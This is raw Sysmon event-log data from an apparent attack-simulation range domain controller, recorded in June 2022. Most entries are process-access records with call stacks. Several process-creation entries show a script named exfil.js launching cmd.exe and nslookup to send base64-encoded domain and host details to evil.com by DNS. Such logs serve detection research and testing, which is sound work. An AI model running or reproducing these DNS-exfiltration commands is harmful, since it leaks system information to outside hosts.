14:21:23.401{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.400{2E1864BB-18E3-629A-7642-000000005F02}54163460C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-7842-000000005F02}5604C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.401{2E1864BB-18E3-629A-7842-000000005F02}5604C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-7642-000000005F02}5416C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlycdh.tmp 2>&1 10341000x8000000000000000206140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.329{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7742-000000005F02}2792C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.326{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7742-000000005F02}2792C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.319{2E1864BB-18E3-629A-7742-000000005F02}27927900C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7642-000000005F02}5416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.305{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7742-000000005F02}2792C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.292{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.291{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.276{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7642-000000005F02}5416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.276{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.276{2E1864BB-18E0-629A-6742-000000005F02}39767060C:\Windows\System32\WScript.exe{2E1864BB-18E3-629A-7642-000000005F02}5416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.289{2E1864BB-18E3-629A-7642-000000005F02}5416C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Model: t3.2xlarge evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlycdh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.276{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzw.tmpMD5=7564BBC357DA8472A939C2EE79A792F5,SHA256=2DBE8B361679ED57394E9EFB1DF40D5559A7E60F6F1F0A6E2904E60B52067C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.260{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=976A74E389186DB7DAF0ED256ECFC19C,SHA256=61C75F6017A825418D48CFFD228E818E8271E47AE91741D70EF1CF605169CB5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.230{2E1864BB-18E3-629A-7442-000000005F02}66806396C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7542-000000005F02}3588C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7542-000000005F02}3588C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.198{2E1864BB-18E3-629A-7342-000000005F02}78486200C:\Windows\system32\cmd.exe{2E1864BB-18E3-629A-7542-000000005F02}3588C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.207{2E1864BB-18E3-629A-7542-000000005F02}3588C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E3-629A-7342-000000005F02}7848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqzw.tmp 2>&1 10341000x8000000000000000206119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.160{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7442-000000005F02}6680C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.160{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E3-629A-7442-000000005F02}6680C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.144{2E1864BB-18E3-629A-7442-000000005F02}66806396C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-7342-000000005F02}7848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.129{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E3-629A-7442-000000005F02}6680C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.129{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 